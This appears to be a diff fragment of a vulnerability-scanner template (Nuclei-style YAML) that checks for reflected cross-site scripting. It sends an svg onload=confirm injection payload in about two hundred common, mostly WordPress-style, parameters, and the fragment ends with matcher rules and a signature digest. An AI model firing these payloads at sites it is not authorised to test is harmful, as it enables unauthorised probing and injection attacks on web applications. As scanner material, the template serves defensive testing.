"i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E" + - "subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E" + - "attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E" + - "sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E" + - "ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E" + - "image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E" + - "up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E" + - "option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E" + - "taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E" + - "deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E" + - "tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E" + - "widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E" + - "num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E" + - "admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E" + - "location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E" host-redirects: true max-redirects: 1 @@ -63,15 +66,15 @@ http: words: - "text/html" - - type: word - part: body - condition: or - negative: true - words: - - "Access Denied" - - "You don't have permission to access" - - type: status status: - 200 + + - type: word + part: body + condition: or + words: + - "Access Denied" + - "You don't have permission to access" + negative: true # digest: 4a0a004730450220422fa88099c081d3188fb7d1e5615710b29e2f5ec74a4daccf72f1faa714fcda02210093290ee6f988d9ad886291b9c801bbdd358e83fdcdd779ecbf65413328fc6d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file